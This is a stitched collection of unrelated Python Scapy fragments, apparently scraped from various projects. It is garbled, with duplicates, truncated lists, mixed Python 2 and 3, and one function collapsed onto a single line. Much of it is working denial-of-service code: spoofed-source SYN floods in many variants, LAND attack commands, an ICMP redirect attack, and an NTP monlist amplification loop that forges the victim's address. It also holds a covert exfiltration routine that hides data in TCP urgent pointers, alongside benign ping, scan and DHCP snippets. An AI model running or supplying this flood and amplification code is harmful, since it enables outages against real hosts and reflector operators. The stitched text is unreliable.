def icmp_redirect(ip_gw, ip_victim, ip_attacker, ip_targetroute):
"""Try ICMP Redirect attack
Args:
ip_gw (str): Gateway IP
ip_victim (str) : Target/Victim IP
ip_attacker (str) : Attacker IP
ip_targetroute (str) : IP of network to reach in ICMP payload
interface ???
"""
ip = IP()
ip.src = ip_gw
ip.dst = ip_victim
icmp = ICMP()
icmp.type = 5
icmp.code = 1
icmp.gw = ip_attacker
ip2 = IP()
ip2.src = ip_victim
ip2.dst = ip_targetroute
icmp2 = ICMP()
icmp2.type = 0
icmp2.code = 0
# Send packets at Layer 3(Scapy creates Layer 2 header), Does not recieve any packets.
send(ip / icmp / ip2 / icmp2, iface="eth1")
def run(self):
# Damn, ugly!
global forging
if forging:
i = IP()
i.dst = ip
if spoofing:
i.src = '.'.join(
random.randint(1, 254) for _ in range(4))
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
try:
send(i / t, verbose=0)
except PermissionError:
print('ohno, not forging')
forging = False
else:
s = socket.socket()
s.connect((self.ip, self.port))
def cmd_land(ip, count, port, iface, verbose):
conf.verb = False
if iface:
conf.iface = iface
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def service_craft(pkt, fp, mac, service, type_=False):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.ttl, 16)
ip.flags = 0x4000
tcp = TCP()
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
if type_:
tcp.flags = 0x018 # PSH / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].ack
data = service[pkt[TCP].dport]
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
return fin_pkt
else:
tcp.flags = 0x012 # SYN / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].seq + 1
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = ICMP() print "Spoofing %s to send ICMP ..." % i.src sr1(i/ICMP,verbose=0)
def seqgen_pkt_craft(pkt, fp, mac, pno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['T1']['TTL'], 16)
ip.flags = fp.probe['T1']['DF']
ip.id = fp.ip_id_gen()
tcp = TCP()
s_val = fp.probe['T1']['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = fp.tcp_seq_gen()
a_val = fp.probe['T1']['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe['T1']['F']
tcp.flags = flag_val
tcp.window = fp.probe['WIN']['W' + pno]
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
tcp.options = fp.probe['OPS']['O' + pno]
rd_val = fp.probe['T1']['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def doSynFlood(origin_ip=None, origin_port=None,
target_ip=None, target_port=None,
interface=None, duration=None, gap=0):
'''
Starts Syn Flood attacks
Arguments:
origin_ip (str): attacker ip
origin_port (int): attacker port
target_ip (str): target ip
target_port (int): target port
interface (str): network interface to use
duration (int): duration of the attack
gap (int): gap (delay) between packets
Returns:
None
'''
# Check if everything is filled out
if target_ip is None:
return
if target_port is None:
return
if duration is None:
return
if gap >= duration:
return
# Prepare the packet
ip_layer = IP()
ip_layer.src = origin_ip
ip_layer.dst = target_ip
tcp_layer = TCP()
tcp_layer.sport = origin_port
tcp_layer.dport = target_port
tcp_layer.flags = "S"
# Prepare timings
time_start = time()
time_end = time_start + duration
# Start attack
while (time() <= time_end): #duration
# Constantly changing values
tcp_layer.seq = GenerateRandomSafeSeq()
tcp_layer.ack = GenerateRandomSafeSeq()
tcp_layer.window = GenerateRandomWindow()
attack_packet = ip_layer/tcp_layer # packet to send
send(attack_packet, iface=interface)
if gap > 0:
sleep(gap) #gap
def run(self):
print "Starting %s %s %d" % (self.name, self.target, self.port)
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = ICMP()
print "Spoofing %s to send ICMP ..." % i.src
sr1(i / ICMP, verbose=0)
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = TCP() t.dport = self.port t.flags='S' print "Spoofing %s to send SYN ..." % i.src sr1(i/t,verbose=0)
def syn_flood(self, target, port):
from scapy.all import IP, TCP, send
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65500)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def udp_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['U1']['TTL'], 16)
ip.flags = fp.probe['U1']['DF']
ip.len = 56
ip.id = 4162
icmp = ICMP()
icmp.type = 3
icmp.unused = 0
icmp.code = 13 # code 3 for reply
iperror = IPerror()
iperror.proto = 'udp'
iperror.ttl = 0x3E
iperror.len = fp.probe['U1']['RIPL']
iperror.id = fp.probe['U1']['RID']
ripck_val = fp.probe['U1']['RIPCK']
if ripck_val == 'G':
pass
elif ripck_val == 'Z':
iperror.chksum = 0
else:
iperror.chksum = pkt[IP].chksum
udperror = UDPerror()
udperror.sport = pkt[UDP].sport
udperror.dport = pkt[UDP].dport
udperror.len = pkt[UDP].len
if fp.probe['U1']['RUCK'] == 'G':
udperror.chksum = pkt[UDP].chksum
else:
udperror.chksum = fp.probe['U1']['RUCK']
try:
ipl = int(fp.probe['U1']['IPL'], 16)
except KeyError:
ipl = None
data = pkt[Raw].load
fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data
return fin_pkt
def cmd_ping(ip, interface, count, timeout, wait, verbose):
"""The classic ping tool that send ICMP echo requests.
\b
# habu.ping 8.8.8.8
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
"""
if interface:
conf.iface = interface
conf.verb = False
conf.L3socket=L3RawSocket
layer3 = IP()
layer3.dst = ip
layer3.tos = 0
layer3.id = 1
layer3.flags = 0
layer3.frag = 0
layer3.ttl = 64
layer3.proto = 1 # icmp
layer4 = ICMP()
layer4.type = 8 # echo-request
layer4.code = 0
layer4.id = 0
layer4.seq = 0
pkt = layer3 / layer4
counter = 0
while True:
ans = sr1(pkt, timeout=timeout)
if ans:
if verbose:
ans.show()
else:
print(ans.summary())
del(ans)
else:
print('Timeout')
counter += 1
if count != 0 and counter == count:
break
sleep(wait)
return True
def cmd_icmp_ping(ip, interface, count, timeout, wait, verbose):
"""The classic ping tool that send ICMP echo requests.
\b
# habu.icmp.ping 8.8.8.8
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
"""
if interface:
conf.iface = interface
conf.verb = False
conf.L3socket = L3RawSocket
layer3 = IP()
layer3.dst = ip
layer3.tos = 0
layer3.id = 1
layer3.flags = 0
layer3.frag = 0
layer3.ttl = 64
layer3.proto = 1 # icmp
layer4 = ICMP()
layer4.type = 8 # echo-request
layer4.code = 0
layer4.id = 0
layer4.seq = 0
pkt = layer3 / layer4
counter = 0
while True:
ans = sr1(pkt, timeout=timeout)
if ans:
if verbose:
ans.show()
else:
print(ans.summary())
del (ans)
else:
print('Timeout')
counter += 1
if count != 0 and counter == count:
break
sleep(wait)
return True
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = self.port
t.flags = 'S'
send(i / t, verbose=0)
def run(self):
print "Starting %s %s %d" % (self.name, self.target, self.port)
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.dport = self.port
t.flags = 'S'
print "Spoofing %s to send SYN ..." % i.src
sr1(i / t, verbose=0)
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
send(i/t, verbose=0)
def send_data(self, bytestream):
if self.verbose():
print("Exfiltrating " + repr(bytestream.decode('us-ascii')))
packet = IP() / TCP()
packet.dst = self.host()
packet.dport = self.dest_port()
packet.sport = self.source_port()
packet.getlayer(TCP).flags = 0x20 | 0x02 # URG & SYN
packet.urgptr = self.int_for(bytestream)
if self.verbose():
packet.show()
send(packet, verbose=self.verbose())
def ntp_amplification(): global g_target_ip, g_ntp_servers # Create the NTP request ip = IP(src = g_target_ip) udp = UDP(sport = RandShort(), dport = 123) ntp = NTPPrivate(mode = 7, implementation = "XNTPD", request_code = "REQ_MON_GETLIST_1") while True: # Send the request to each of the NTP servers for ntp_ip in g_ntp_servers: ip.dst = ntp_ip packet = ip/udp/ntp send(packet)
def run(self):
packet_ip = IP()
packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254))
packet_ip.dst = self.host
packet_tcp = TCP()
packet_tcp.sport = random.randint(1024, 65535)
packet_tcp.dport = self.port
packet_tcp.flags = 'S'
send(packet_ip/packet_tcp)
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
conf.iface = iface
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def ecn_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['ECN']['TTL'], 16)
ip_flag = fp.probe['ECN']['DF']
if ip_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0
ip.id = fp.ip_id_gen()
tcp = TCP()
w_val = fp.probe['ECN']['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
cc_val = fp.probe['ECN']['CC']
if cc_val == 'Y':
tcp.flags = 0x52
elif cc_val == 'N':
tcp.flags = 0x12
elif cc_val == 'S':
tcp.flags = 0xD2
else:
tcp.flags = 0x10
o_val = fp.probe['ECN']['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def IP_layer(attributes):
layer3 = IP()
layer3.version = attributes['version']
layer3.ihl = attributes['ihl']
layer3.tos = attributes['tos']
layer3.len = attributes['len']
layer3.id = attributes['id']
layer3.flags = attributes['flags']
layer3.frag = attributes['frag']
layer3.ttl = attributes['ttl']
layer3.proto = attributes['proto']
layer3.src = attributes['src']
layer3.dst = attributes['dst']
return layer3
def three_way_handshake(ip_dst, sniffer, port_num):
ip = IP(ttl=255)
ip.src = MY_IP
ip.dst = ip_dst
tcp = TCP(
sport=port_num,
dport=443,
flags='S',
seq=1000,
window=65535,
options=[("MSS", MSS_SIZE), ('WScale', 10)])
SYNACK = sr1(ip / tcp, verbose=False, timeout=2)
if not SYNACK:
return "NOSYNACK"
tls = TLSRecord() / TLSHandshakes(handshakes=[
TLSHandshake() / TLSClientHello(
compression_methods=list(range(0xff))[::-1],
cipher_suites=list(range(0xff)))
])
tls_raw = str(tls)
ptr = 0
current_ack = SYNACK.ack
if SYNACK.seq is None:
return "SYNACKERROR"
while ptr < len(tls_raw):
ACK = TCP(
sport=port_num,
dport=443,
flags='A',
seq=current_ack,
ack=SYNACK.seq + 1,
window=65535,
options=[("MSS", MSS_SIZE), ('WScale', 10)])
tls_frag = tls_raw[ptr:ptr + MSS_SIZE]
send(ip / ACK / tls_frag, verbose=False)
ptr += MSS_SIZE
current_ack += len(tls_frag)
sniffer.client_hello_sent = True
return "SUCCESS"
def cmd_ping(ip, interface, count, timeout, wait, verbose):
if interface:
conf.iface = interface
conf.verb = False
conf.L3socket = L3RawSocket
layer3 = IP()
layer3.dst = ip
layer3.tos = 0
layer3.id = 1
layer3.flags = 0
layer3.frag = 0
layer3.ttl = 64
layer3.proto = 1 # icmp
layer4 = ICMP()
layer4.type = 8 # echo-request
layer4.code = 0
layer4.id = 0
layer4.seq = 0
pkt = layer3 / layer4
counter = 0
while True:
ans = sr1(pkt, timeout=timeout)
if ans:
if verbose:
ans.show()
else:
print(ans.summary())
del (ans)
else:
print('Timeout')
counter += 1
if count != 0 and counter == count:
break
sleep(wait)
return True
def is_port_open(ip_addr, port, timeout=5, verbose=False):
ip = IP()
ip.dst = ip_addr
syn = TCP()
syn.sport = choice(range(1000, 50000))
syn.dport = port
syn.flags = 'S'
syn.seq = 1
packet = ip/syn
synack = sr1(packet, timeout=timeout, verbose=verbose)
if synack and synack.sprintf('%TCP.flags%') == 'SA':
return True
return False
def sendSYN(host, port):
# Create an IP Packet using random ip as source and the target IP as destination
ipPacket = IP()
ipPacket.src = ".".join(
map(str, (random.randint(0, 255) for i in range(4))))
ipPacket.dst = host
# Create a TCP segment using a random source port and the target port as the destination
tcpSegment = TCP()
tcpSegment.sport = random.randint(1000, 65535)
tcpSegment.dport = port
# Set the syn flag
tcpSegment.flags = 'S'
# Send the composition of the two (package/segment) and ignore the result
send(ipPacket / tcpSegment, verbose=0)
pass
def flood(target):
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}")
else:
print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
conf.verb = False
if interface:
conf.iface = interface
layer2 = Ether()
layer3 = IP()
layer3.dst = ip
layer4 = TCP()
layer4.dport = port
pkt = layer2 / layer3 / layer4
counter = 0
print("Please, remember to block your RST responses", file=sys.stderr)
while True:
if forgeip:
pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit(
'.', maxsplit=1)[0], randint(1, 254))
if forgemac:
pkt[Ether].src = RandMAC()
pkt[TCP].sport = randint(10000, 65000)
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
sendp(pkt)
counter += 1
if count != 0 and counter == count:
break
return True
def syn_flood(ip_destination, port_destination, limit):
total = 0
print("Enviando Pacotes")
for x in range(0, limit):
ip_packet = IP()
ip_packet.src = ".".join(
map(str, (random.randint(0, 255) for _ in range(4))))
ip_packet.dst = ip_destination
tcp_packet = TCP()
tcp_packet.sport = random.randint(1000, 9000)
tcp_packet.dport = port_destination
tcp_packet.flags = "S"
tcp_packet.seq = random.randint(1000, 9000)
tcp_packet.window = random.randint(1000, 9000)
print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport))
send(ip_packet / tcp_packet, verbose=0)
total += 1
print("All packets sent")
def icmp_craft(pkt, fp, mac):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['IE']['TTL'], 16)
dfi_flag = fp.probe['IE']['DFI']
if dfi_flag == 'N':
ip.flags = 0
elif dfi_flag == 'S':
ip.flags = pkt[IP].flags
elif dfi_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0 if pkt[IP].flags == 2 else 2
ip.id = fp.ip_id_icmp_gen()
icmp = ICMP()
icmp.type = 0
icmp.id = pkt[ICMP].id
cd_val = fp.probe['IE']['CD']
if cd_val == 'Z':
icmp.code = 0
elif cd_val == 'S':
icmp.code = pkt[ICMP].code
else:
icmp.code = random.randint(0, 15)
icmp.seq = pkt[ICMP].seq
data = pkt[ICMP].payload
fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data
return fin_pkt
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(f"[{red} bold][✘] ERROR[/{red} bold] " +
f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}")
else:
print(f"[{green}][✔] SUCCESS[/{green}] " +
f"[{yellow}]SYN packet sent to[{yellow}] " +
f"[{blue}]{'{}:{}'.format(*target)}")
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(e)
else:
print("[+] SYN packet sent!")
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(
f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}"
)
else:
print(
f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m"
)
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
"""Launch a lot of TCP connections and keeps them opened.
Some very old systems can suffer a Denial of Service with this.
Reference: https://en.wikipedia.org/wiki/SYN_flood
Example:
\b
# sudo habu.synflood 172.16.0.10
.................
Each dot is a packet sent.
You can use the options '-2' and '-3' to forge the layer 2/3 addresses.
If you use them, each connection will be sent from a random layer2 (MAC)
and/or layer3 (IP) address.
You can choose the number of connections to create with the option '-c'.
The default is never stop creating connections.
Note: If you send the packets from your real IP address and you want
to keep the connections half-open, you need to setup for firewall to
don't send the RST packets.
"""
conf.verb = False
if interface:
conf.iface = interface
layer2 = Ether()
layer3 = IP()
layer3.dst = ip
layer4 = TCP()
layer4.dport = port
pkt = layer2 / layer3 / layer4
counter = 0
print("Please, remember to block your RST responses", file=sys.stderr)
while True:
if forgeip:
pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))
if forgemac:
pkt[Ether].src = RandMAC()
pkt[TCP].sport = randint(10000, 65000)
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
sendp(pkt)
counter += 1
if count != 0 and counter == count:
break
return True
import sys
from scapy.all import sr1, IP, TCP, UDP, ICMP
# User must supply host and port
if len(sys.argv) < 3:
print "Invalid syntax: ps.py [-u -t -i] <target IP> <p1[ p2 p3 ...]>"
else:
# TCP SYN
if sys.argv[1] == "-t":
print "TCP SYN scan on host " + sys.argv[2] + "\n"
ip = IP()
tcp = TCP()
# cast as str and int to avoid issues caused by periods
ip.dst = str(sys.argv[2])
# loop iterates through as many commandline arguments were given
for port in range(len(sys.argv) - 3):
print "Scanning port " + str(sys.argv[port + 3])
# port+3 is start of ports
tcp.dport = int(sys.argv[port + 3])
# send SYN packet
tcp.flags = "S"
packet = (ip / tcp)
# verbose=0 to limit console output; timeout 1s
status = sr1(packet, verbose=0, timeout=1)
if status:
print str(packet.dport) + " is open\n"
# UDP
elif sys.argv[1] == "-u":
print "UDP scan on host " + sys.argv[2] + "\n"
53, # dns
443, # https
110, # pop3
445, # ms-ds
8080, # tomcat
4567, # filenail (commonly open port for backdoors)
]
# try each common port until one responds
for port in common_ports:
# assemble IP packet with target IP
ip = IP()
ip.dst = target_ip
# assemble TCP with dst port and SYN flag set
tcp = TCP()
tcp.dport = port
tcp.flags = 'S'
print('Trying port %d' % port)
# send the packet and wait 2 seconds for an answer
rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)
# if answered no need to try more ports
if cpid:
# the sending process
sleep(5) # to make sure that the other process started listening for packets
if ip6 == False:
pkt = IP(dst = int2addr(addrbeg,ip6))/TCP(sport = 1026, dport = port)
else:
pkt = IPV6(dst = int2addr(addrbeg,ip6))/TCP(sport = 1026, dport = port)
host = addrbeg
try:
while host <= addrend:
ip = int2addr(host , ip6)
pkt.dst = ip # FIXME
pkt.seq = seqgen(ip+":"+str(port)+salt)
send(pkt)
host+=1
os.wait()
except:
os.kill(cpid,15)
else:
# this is the listening and printing process
try:
sniff(filter = "ip and tcp", lfilter = lambda x: checkpkt(x))
except:
pass
A very basic script to send a DHCP Discover message.
Capture the packages to see what's wrong.
"""
import scapy
from scapy.sendrecv import sendp, sniff
from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP
# data link layer
ethernet = Ether()
ethernet.show()
ethernet.dst = "ff:ff:ff:ff:ff:ff"
# network layer
ip = IP()
ip.show()
ip.dst = "255.255.255.255"
# transport layer
udp = UDP()
udp.show()
udp.sport = 68
udp.dport = 67
# application layer
bootp = BOOTP()
bootp.show()
bootp.flags = 1
dhcp = DHCP()
dhcp.show()
dhcp.options = [("message-type", "discover"), "end"]
#*** Get parameters from command line
SRC_MAC = sys.argv[1]
DST_MAC = sys.argv[2]
SRC_IP = sys.argv[3]
DST_IP = sys.argv[4]
IF_NAME = sys.argv[5]
REPEAT_INTERVAL = float(sys.argv[6])
REPEAT_COUNT = int(sys.argv[7])
data = "blahblahblah"
# define ip and icmp
eth = Ether()
eth.src=SRC_MAC
eth.dst=DST_MAC
ip = IP()
ip.src = SRC_IP
ip.dst = DST_IP
icmp = ICMP()
icmp.type = 8
icmp.code = 0
finished = 0
count = 0
while not finished:
sendp(eth/ip/icmp/data, iface=IF_NAME)
time.sleep(REPEAT_INTERVAL)
count += 1
if count >= REPEAT_COUNT:
finished = 1
53, # dns
443, # https
110, # pop3
445, # ms-ds
8080, # tomcat
4567, # filenail (commonly open port for backdoors)
]
# try each common port until one responds
for port in common_ports:
# assemble IP packet with target IP
ip = IP()
ip.dst = target_ip
# assemble TCP with dst port and SYN flag set
tcp = TCP()
tcp.dport = port
tcp.flags = 'S'
print 'Trying port %d' % port
# send the packet and wait 2 seconds for an answer
rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)
# if answered no need to try more ports
